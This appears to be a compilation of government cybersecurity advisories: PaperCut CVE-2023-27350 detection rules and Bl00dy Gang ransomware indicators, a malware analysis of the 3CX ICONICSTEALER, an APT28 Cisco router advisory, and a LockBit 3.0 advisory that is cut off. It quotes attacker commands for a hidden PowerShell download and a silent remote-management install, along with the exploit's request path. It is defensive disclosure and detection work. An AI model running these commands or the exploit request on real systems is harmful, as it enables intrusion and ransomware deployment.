  msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)";
  flow:established,to_server;
  http.method; content:"GET";
  http.uri; content:"/app?service=page/SetupCompleted"; bsize:32; fast_pattern;
  reference:cve,2023-27350;
  classtype:attempted-admin;

alert http any any -> $HOME_NET any (msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"page/SetupCompleted"; fast_pattern; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; reference:cve,2023-27350; classtype:attempted-admin; metadata:attack_target Server, cve CVE_2023_27350, deployment Perimeter, deployment Internal, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, confidence High, signature_severity Major, updated_at 2023_05_05;)

Note that these signatures and other rule-based detections, including YARA rules, may fail to detect more advanced iterations of CVE-2023-27350 exploits. Actors are known to adapt exploits to circumvent rule-based detections formulated for the original iterations of exploits observed in the wild. For example, the first rule above detected some of the first known exploits of CVE-2023-27350, but a slight modification of the exploit’s GET request can evade that rule. The second rule was designed to detect a broader range of activity than the first rule.

The following additional Emerging Threat Suricata signatures are designed to detect Domain Name System (DNS) lookups of known malicious domains associated with recent PaperCut exploitation:

alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowcsupdates .com)"; dns_query; content:"windowcsupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowcsupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)

alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdate .com)"; dns_query; content:"anydeskupdate.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)anydeskupdate.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)

alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdates .com)"; dns_query; content:"anydeskupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)anydeskupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)

alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecemter .com)"; dns_query; content:"windowservicecemter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecemter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)

alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (winserverupdates .com)"; dns_query; content:"winserverupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)winserverupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)

alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (netviewremote .com)"; dns_query; content:"netviewremote.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)netviewremote.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)

alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (updateservicecenter .com)"; dns_query; content:"updateservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)updateservicecenter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)

alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecenter .com)"; dns_query; content:"windowservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecenter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)

alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecentar .com)"; dns_query; content:"windowservicecentar.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecentar.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category ATTACK_RESPONSE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)

Note that these signatures may also not work if the actor modified activity to evade detection by known rules.

System Monitoring

A child process is spawned under pc-app.exe when the vulnerable PaperCut software is used to execute another process, which is the PaperCut server process. Malicious activity against PaperCut servers in mid-April used the RCE to supply commands to a cmd.exe or powershell.exe child process, which were then used to conduct further network exploitation. The following YARA rule may detect malicious activity[2].

title: PaperCut MF/NG Vulnerability 
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG 
logsource:
  category: process_creation 
  product: windows 
detection: 
  selection: 
    ParentImage|endswith: “\pc-app.exe” 
    Image|endswith:  
      - “\cmd.exe” 
      - “\powershell.exe” 
  condition: selection 
level: high 
falsepositives:     
  - Expected admin activity

More advanced versions of the exploit can drop a backdoor executable, use living-off-the-land binaries, or attempt to evade the above YARA rule by spawning an additional child process in-between pc-app.exe and a command-line interpreter.

Server Settings and Log Files

Network defenders may be able to identify suspicious activity by reviewing the PaperCut server options to identify unfamiliar print scripts or User/Group Sync settings.

If the PaperCut Application Server logs have debug mode enabled, lines containing SetupCompleted at a time not correlating with the server installation or upgrade may be indicative of a compromise. Server logs can be found in [app-path]/server/logs/*.* where server.log is normally the most recent log file.
Any of the following server log entries may be indicative of a compromise:

  • User "admin" updated the config key “print.script.sandboxed”
  • User "admin" updated the config key “device.script.sandboxed”
  • Admin user "admin" modified the print script on printer
  • User/Group Sync settings changed by "admin"

Indicators of Compromise

See Table 1 through Table 6 for IOCs obtained from FBI investigations and open-source information as of early May 2023.

Table 1: Bl00dy Gang Ransomware Email Addresses

Email Addresses

decrypt.support@privyonline[.]com

fimaribahundqf@gmx[.]com

main-office@data-highstream[.]com

prepalkeinuc0u@gmx[.]com

tpyrcne@onionmail[.]org

 

Table 2: Bl00dy Gang Ransomware Tox ID

Tox ID

E3213A199CDA7618AC22486EFECBD9F8E049AC36094D56AC1BFBE67EB9C3CF2352CAE9EBD35F

 

Table 3: Bl00dy Gang Ransomware IP addresses

IP Address

Port

>Date

Description

102.130.112[.]157

-

April 2023

N/A

172.106.112[.]46

-

April 2023

Resolves to Tor node. Network communications with nethelper.exe.

176.97.76[.]163

-

April 2023

Resolves to datacenter Tor node.

192.160.102[.]164

 

 

April 2023

Resolves to Tor node. Network communications with nethelper.exe.

194.87.82[.]7

-

April 2023

TrueBot C2. DiceLoader malware.

195.123.246[.]20

-

April 2023

TrueBot C2. DiceLoader malware.

198.50.191[.]95

 

 

April 2023

Resolves to Tor node. Network communications with nethelper.exe.

206.197.244[.]75

>443

April 2023

N/A

216.122.175[.]114

 

 

April 2023

Outbound communications from powershell.exe.

46.4.20[.]30

 

April 2023

Resolves to Tor node. Network communications with nethelper.exe.

5.188.206[.]14

-

April 2023

N/A

5.8.18[.]233

-

April 2023

Cobalt Strike C2.

5.8.18[.]240

-

April 2023

Cobalt Strike C2.

80.94.95[.]103

-

April 2023

N/A

89.105.216[.]106

443

April 2023

Resolves to Tor node. Network communications with nethelper.exe.

92.118.36[.]199

9100, 443

April 2023

Outbound communications from svchost.exe.

http://192.184.35[.]216:443/

4591187629.exe

-

April 2023

File 4591187629.exe is possibly cryptominer malware.

 

Table 4: Bl00dy Gang Ransomware Domains

Malicious Domain

Description

anydeskupdate[.]com

N/A

anydeskupdates[.]com

N/A

ber6vjyb[.]com

Associated with TrueBot C2

netviewremote[.]com

N/A

study.abroad[.]ge

Associated with Cobalt Strike Beacon

upd343.winserverupdates[.]com

Associated with Cobalt Strike Beacon

upd488.windowservicecemter[.]com

Associated with TrueBot payload

upd488.windowservicecemter[.]com/download/update.dll

File: Cobalt Strike Beacon

updateservicecenter[.]com

N/A

windowcsupdates[.]com

N/A

windowservicecemter[.]com

Associated with TrueBot payload

windowservicecentar[.]com

N/A

windowservicecenter[.]com

N/A

winserverupdates[.]com

N/A

winserverupdates[.]com

N/A

 

Table 5: Bl00dy Gang Ransomware Known Commands

Command

Description

cmd /c “powershell.exe -nop -w hidden

Launches powershell.exe in a hidden window without loading the user's PowerShell profile.

Invoke-WebRequest ‘/setup.msi’

 -OutFile ‘setup.msi’ ”

Downloads setup.msi, saving it as setup.msi, in the current PowerShell working directory.

cmd /c “msiexec /i setup.msi /qn  IntegratorLogin= CompanyId=1”

Installs legitimate Atera RMM software on the system silently, with the specified email address and company ID properties.

 

Table 6: Bl00dy Gang Ransomware Malicious Files

File

SHA-256

Description

/windows/system32/config/
systemprofile/appdata/roaming/tor/

N/A

Unspecified files created in Tor directory

/windows/temp/
socks.exe

6bb160ebdc59395882ff322e67e000a22a5c54ac777b6b1f10f1fef381df9c15

Reverse SOCKS5 tunneler with TLS support (see https://github.com/kost/revsocks)

/windows/temp/servers.txt

N/A

Unspecified content within servers.txt file; likely a list of proxy servers for revsocks(socks.exe)

ld.txt

c0f8aeeb2d11c6e751ee87c40ee609aceb1c1036706a5af0d3d78738b6cc4125

TrueBot malware

nethelper.exe

N/A

Unknown file used to send outbound communications through Tor

update.dll

0ce7c6369c024d497851a482e011ef1528ad270e83995d52213276edbe71403f

Cobalt Strike Beacon

INCIDENT RESPONSE

If compromise is suspected or detected, organizations should:

  1. Create a backup of the current PaperCut server(s).
  2. Wipe the PaperCut Application Server and/or Site Server and rebuild it.
  3. Restore the database from a “safe” backup point. Using a backup dated prior to April 2023 would be prudent, given that exploitation in-the-wild exploitation began around early April.
  4. Execute additional security response procedures and carry out best practices around potential compromise.
  5. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov. Regarding specific information that appears in this communication, the context and individual indicators, particularly those of a non-deterministic or ephemeral nature (such as filenames or IP addresses), may not be indicative of a compromise. Indicators should always be evaluated in light of an organization’s complete information security situation. 

MITIGATIONS

FBI and CISA recommend organizations:

  • Upgrade PaperCut to the latest version.
  • If unable to immediately patch, ensure vulnerable PaperCut servers are not accessible over the internet and implement one of the following network controls:
    • Option 1: External controls: Block all inbound traffic from external IP addresses to the web management portal (port 9191 and 9192 by default).
    • Option 2: Internal and external controls: Block all traffic inbound to the web management portal. Note: The server cannot be managed remotely after this step.
  • Follow best cybersecurity practices in your production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and for all services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and FBI also recommend all organizations implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

ACKNOWLEDGMENTS

The Multi-State Information Sharing and Analysis Center (MS-ISAC) contributed to this advisory.
REFERENCES
[1] PaperCut: URGENT | PaperCut MF/NG vulnerability bulletin (March 2023)
[2] Huntress: Critical Vulnerabilities in PaperCut Print Management Software

This product is provided subject to this Notification and this Privacy & Use policy.

April 20, 2023

MAR-10435108-1.v1 ICONICSTEALER | CISA

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Disclosure is not limited. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

This submission included one unique file. This file has been identified as a variant of the malware known as ICONICSTEALER. This variant of malware was utilized in the supply chain attack on the commercial software 3CXDesktopApp. The primary purpose of this malware is to steal sensitive data from a victim user's web browser, and make it available for exfiltration by a separate malicious component.

Download the PDF version of this report:

Submitted Files (1)

e2ef455e92b3cb5a4c0f3093191d0bfb4fe3ff961e2a403feaa26060a298c70f (infostealer.dll)

Findings

e2ef455e92b3cb5a4c0f3093191d0bfb4fe3ff961e2a403feaa26060a298c70f

Tags

backdoor information-stealer trojan

Details
Name infostealer.dll
Size 1186167 bytes
Type PE32+ executable (DLL) (GUI) x86-64, for MS Windows
MD5 c9f452576b2430814821da0223a535c8
SHA1 cad1120d91b812acafef7175f949dd1b09c6c21a
SHA256 e2ef455e92b3cb5a4c0f3093191d0bfb4fe3ff961e2a403feaa26060a298c70f
SHA512 9099c4f970b04400b1b9db283ba60850e806217a3fbceba8bac5168621ad1994cf2c5a77e4ff7639c1660eba79504a5de684e0c7e3e746d3c8fe60111f436428
ssdeep 24576:qxvjY/8tWCp4I1+HufhT3cimlXiOHhMdR03ZCNgqI0XK:8WCKI1zT3cimlXichMXwCrI
Entropy 6.476725
Antivirus
AhnLab Infostealer/Win.Agent
Antiy Trojan/Win64.NukeSped
Avira TR/NukeSped.grojn
Bitdefender Gen:Variant.SupplyChainAgent.8
Emsisoft Gen:Variant.SupplyChainAgent.8 (B)
ESET Win64/NukeSped.OX trojan
K7 Trojan ( 005a1eee1 )
Trend Micro TrojanS.82E50547
Trend Micro HouseCall TrojanS.82E50547
VirusBlokAda Trojan.Win64.SamScissors
YARA Rules
  • rule CISA_10435108_01 : trojan backdoor steals_authentication_credentials
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10435108"
           Date = "2023-04-12"
           Last_Modified = "20230412_1700"
           Actor = "n/a"
           Family = "3CXDESKTOPAPP"
           Capabilities = "steals-authentication-credentials"
           Malware_Type = "trojan backdoor"
           Tool_Type = "n/a"
           Description = "Detects 3CXDesktopApp InfoStealer samples"
           SHA256_1 = "e2ef455e92b3cb5a4c0f3093191d0bfb4fe3ff961e2a403feaa26060a298c70f"
       strings:
           $s0 = { 53 00 45 00 4c 00 45 00 43 00 54 00 20 00 75 00 }
           $s1 = { 72 00 6c 00 2c 00 20 00 74 00 69 00 74 00 6c 00 }
           $s2 = { 65 00 20 00 46 00 52 00 4f 00 4d 00 20 00 6d }
           $s3 = { 6f 00 7a 00 5f 00 70 00 6c 00 61 00 63 00 65 00 }
           $s4 = { 4d 00 6f 00 7a 00 69 00 6c 00 6c 00 61 00 5c 00 }
           $s5 = { 46 00 69 00 72 00 65 00 66 00 6f 00 78 00 5c }
           $s6 = { 33 00 43 00 58 00 44 00 65 00 73 00 6b 00 74 00 6f 00 70 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Description

This file is a 64-bit Windows DLL (Dynamic-link Library). Analysis indicates this application was part of a supply chain attack against the commercial application 3CXDesktopApp. This malicious DLL was included within an installer for the 3CXDesktopApp. The primary purpose of this DLL is to steal information from various web browsers employed by a victim user. This malware is being referred to in open source as ICONICSTEALER. During runtime the application first attempts to read a file named "\3CXDesktopApp\config.json". Additionally, the malware attempts to collect the victim system's hostname, domain name, and OS version (Figure 1).

The malicious application next attempts to steal sensitive information from the victim user's web browser. Specifically it will target the Chrome, Edge, Brave, or Firefox browsers (Figure 2). It uses an embedded SQLITE library to query the browser databases for sensitive information (Figure 3). Analysis indicates the data stolen from the web browsers will be websites recently visited including sensitive parameters passed to the sites. These parameters could include sensitive information including login credentials or credit card numbers.

No exfiltration capability was discovered within this malicious application, indicating it works with another malicious component to exfiltrate collected data.

Screenshots
Figure 1 - This screenshot illustrates this malware attempting to access the file \3CXDesktopApp\config.json.

Figure 1 - This screenshot illustrates this malware attempting to access the file \3CXDesktopApp\config.json.

Figure 2 - This screenshot illustrates web browsers targeted by this malware, known as ICONICSTEALER.

Figure 2 - This screenshot illustrates web browsers targeted by this malware, known as ICONICSTEALER.

Figure 3 - This screenshot illustrates the malware beginning to search through folders of various web browsers looking for the database files. The database files will be queried with an embedded SQLITE library looking for sensitive information.

Figure 3 - This screenshot illustrates the malware beginning to search through folders of various web browsers looking for the database files. The database files will be queried with an embedded SQLITE library looking for sensitive information.

Figure 4 - This screenshot indicates the malware

Figure 4 - This screenshot indicates the malware "backs up" the web browser databases before querying them for sensitive information. It may do this to prevent accidental corruption of the databases, or to prevent the browser from crashing if the user is currently browsing the web.

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

This product is provided subject to this Notification and this Privacy & Use policy.

ACKNOWLEDGEMENTS

SentinelOne contributed to this report.

 

April 17, 2023

APT28 Exploits Known Vulnerability to Carry Out Reconnaissance and Deploy Malware on Cisco Routers | CISA

APT28 accesses poorly maintained Cisco routers and deploys malware on unpatched devices using CVE-2017-6742.

Overview and Context

The UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure Security Agency (CISA) and US Federal Bureau of Investigation (FBI) are releasing this joint advisory to provide details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of Cisco routers in 2021.

We assess that APT28 is almost certainly the Russian General Staff Main Intelligence Directorate (GRU) 85th special Service Centre (GTsSS) Military Intelligence Unit 26165. APT28 (also known as Fancy Bear, STRONTIUM, Pawn Storm, the Sednit Gang and Sofacy) is a highly skilled threat actor.

Download the UK PDF version of this report:

Download the US PDF version of this report:

Previous Activity

The NCSC has previously attributed the following activity to APT28:

For more information on APT28 activity, see the advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.

As of 2021, APT28 has been observed using commercially available code repositories, and post-exploit frameworks such as Empire. This included the use of PowerShell Empire, in addition to Python versions of Empire.

Reconnaissance

Use of SNMP Protocol to Access Routers

In 2021, APT28 used infrastructure to masquerade Simple Network Management protocol (SNMP) access into Cisco routers worldwide. This included a small number based in Europe, US government institutions and approximately 250 Ukrainian victims.

SNMP is designed to allow network administrators to monitor and configure network devices remotely, but it can also be misused to obtain sensitive network information and, if vulnerable, exploit devices to penetrate a network.

A number of software tools can scan the entire network using SNMP, meaning that poor configuration such as using default or easy-to-guess community strings, can make a network susceptible to attacks.

Weak SNMP community strings, including the default "public," allowed APT28 to gain access to router information. APT28 sent additional SNMP commands to enumerate router interfaces. [T1078.001]

The compromized routers were configured to accept SNMP v2 requests. SNMP v2 doesn’t support encryption and so all data, including community strings, is sent unencrypted.

Exploitation of CVE-2017-6742

APT28 exploited the vulnerability CVE-2017-6742 (Cisco Bug ID: CSCve54313) [T1190]. This vulnerability was first announced by Cisco on 29 June 2017, and patched software was made available. 

Cisco's published advisory provided workarounds, such as limiting access to SNMP from trusted hosts only, or by disabling a number of SNMP Management Information bases (MIBs).

Malware Deployment

For some of the targeted devices, APT28 actors used an SNMP exploit to deploy malware, as detailed in the NCSC’s Jaguar Tooth Malware Analysis Report. This malware obtained further device information, which is exfiltrated over trivial file transfer protocol (TFTP), and enabled unauthenticated access via a backdoor.

The actor obtained this device information by executing a number of Command Line Interface (CLI) commands via the malware. It includes discovery of other devices on the network by querying the Address Resolution Protocol (ARP) table to obtain MAC addresses. [T1590]

Indicators of Compromise (IoCs)

Please refer to the accompanying Malware Analysis Report for indicators of compromise which may help to detect this activity.

MITRE ATT&CK®

This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.

For detailed TTPs, see the Malware Analysis Report.

Tactic

ID

Technique

Procedure

Initial Access

T1190

Exploit Public-facing Application.

APT28 exploited default/well-known community strings in SNMP as outlined in CVE-2017-6742 (Cisco Bug ID: CSCve54313).

Initial Access

T1078.001

Valid Accounts: Default Accounts.

Actors accessed victim routers by using default community strings such as “public.”

Reconnaissance

T1590

Gather Victim Network Information

Access was gained to perform reconnaissance on victim devices. Further detail of how this was achieved in available in the MITRE ATT&CK section of the Jaguar Tooth MAR.

Conclusion

APT28 has been known to access vulnerable routers by using default and weak SNMP community strings, and by exploiting CVE-2017-6742 (Cisco Bug ID: CSCve54313) as published by Cisco.

TTPs in this advisory may still be used against vulnerable Cisco devices. Organizations are advised to follow the mitigation advice in this advisory to defend against this activity.

Reporting

UK organizations should report any suspected compromises to the NCSC.
US organisations should contact CISA’s 24/7 Operations Centre at report@cisa.gov or (888) 282-0870.

Mitigation

Mitigation

  • Patch devices as advised by Cisco. The NCSC also has general guidance on managing updates and keeping software up to date.
  • Do not use SNMP if you are not required to configure or manage devices remotely to prevent unauthorized users from accessing your router.
    • If you are required to manage routers remotely, establish allow and deny lists for SNMP messages to prevent unauthorized users from accessing your router.
  • Do not allow unencrypted (i.e., plaintext) management protocols, such as SNMP v2 and Telnet. Where encrypted protocols aren’t possible, you should carry out any management activities from outside the organization through an encrypted virtual private network (VPN), where both ends are mutually authenticated.
  • Enforce a strong password policy. Don’t reuse the same password for multiple devices. Each device should have a unique password. Where possible, avoid legacy password-based authentication and implement two-factor authentication based on public-private key.
  • Disable legacy unencrypted protocols such as Telnet and SNMP v1 or v2c. Where possible, use modern encrypted protocols such as SSH and SNMP v3. Harden the encryption protocols based on current best security practice. The NCSC strongly advises owners and operators to retire and replace legacy devices that can’t be configured to use SNMP v3.
  • Use logging tools to record commands executed on your network devices, such as TACACS+ and Syslog. Use these logs to immediately highlight suspicious events and keep a record of events to support an investigation if the device’s integrity is ever in question. See NCSC guidance on monitoring and logging.
  • If you suspect your router has been compromised:
    • Follow Cisco’s advice for verifying the Cisco IOS image.
    • Revoke all keys associated with that router. When replacing the router configuration be sure to create new keys rather than pasting from the old configuration.
    • Replace both the ROMMON and Cisco IOS image with an image that has been sourced directly from the Cisco website, in case third party and internal repositories have been compromised.
  • NSA’s Network Infrastructure guide provides some best practices for SNMP.
  • See also the Cisco IOS hardening guide and Cisco’s Jaguar Tooth blog.

This product is provided subject to this Notification and this Privacy & Use policy.

March 15, 2023

#StopRansomware: LockBit 3.0 | CISA

SUMMARY

Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

Actions to take today to mitigate cyber threats from ransomware:

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.

The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.

The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report: 

#StopRansomware: Lockbit (PDF, 688.70 KB )

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 12. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK for Enterprise.

CAPABILITIES

LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware.

LockBit 3.0 is configured upon compilation with many different options that determine the behavior of the ransomware. Upon the actual execution of the ransomware within a victim environment, various arguments can be supplied to further modify the behavior of the ransomware. For example, LockBit 3.0 accepts additional arguments for specific operations in lateral movement and rebooting into Safe Mode (see LockBit Command Line parameters under Indicators of Compromise). If a LockBit affiliate does not have access to passwordless LockBit 3.0 ransomware, then a password argument is mandatory during the execution of the ransomware. LockBit 3.0 affiliates failing to enter the correct password will be unable to execute the ransomware [T1480.001]. The password is a cryptographic key which decodes the LockBit 3.0 executable. By protecting the code in such a manner, LockBit 3.0 hinders malware detection and analysis with the code being unexecutable and unreadable in its encrypted form. Signature-based detections may fail to detect the LockBit 3.0 executable as the executable’s encrypted potion will vary based on the cryptographic key used for encryption while also generating a unique hash. When provided the correct password, LockBit 3.0 will decrypt the main component, continue to decrypt or decompress its code, and execute the ransomware.

LockBit 3.0 will only infect machines that do not have language settings matching a defined exclusion list. However, whether a system language is checked at runtime is determined by a configuration flag originally set at compilation time. Languages on the exclusion list include, but are not limited to, Romanian (Moldova), Arabic (Syria), and Tatar (Russia). If a language from the exclusion list is detected [T1614.001], LockBit 3.0 will stop execution without infecting the system.

INITIAL ACCESS

Affiliates deploying LockBit 3.0 ransomware gain initial access to victim networks via remote desktop protocol (RDP) exploitation [T1133], drive-by compromise [T1189], phishing campaigns [T1566], abuse of valid accounts [T1078], and exploitation of public-facing applications [T1190].

EXECUTION AND INFECTION PROCESS

During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges [TA0004]. LockBit 3.0 performs functions such as:

  • Enumerating system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices [T1082]
  • Terminating processes and services [T1489]
  • Launching commands [TA0002]
  • Enabling automatic logon for persistence and privilege escalation [T1547]
  • Deleting log files, files in the recycle bin folder, and shadow copies residing on disk [T1485], [T1490]

LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. When compiled, LockBit 3.0 may also enable options for spreading via Group Policy Objects and PsExec using the Server Message Block (SMB) protocol. LockBit 3.0 attempts to encrypt [T1486] data saved to any local or remote device, but skips files associated with core system functions.

After files are encrypted, LockBit 3.0 drops a ransom note with the new filename .README.txt and changes the host’s wallpaper and icons to LockBit 3.0 branding [T1491.001]. If needed, LockBit 3.0 will send encrypted host and bot information to a command and control (C2) server [T1027].

Once completed, LockBit 3.0 may delete itself from the disk [T1070.004] as well as any Group Policy updates that were made, depending on which options were set at compilation time.

EXFILTRATION

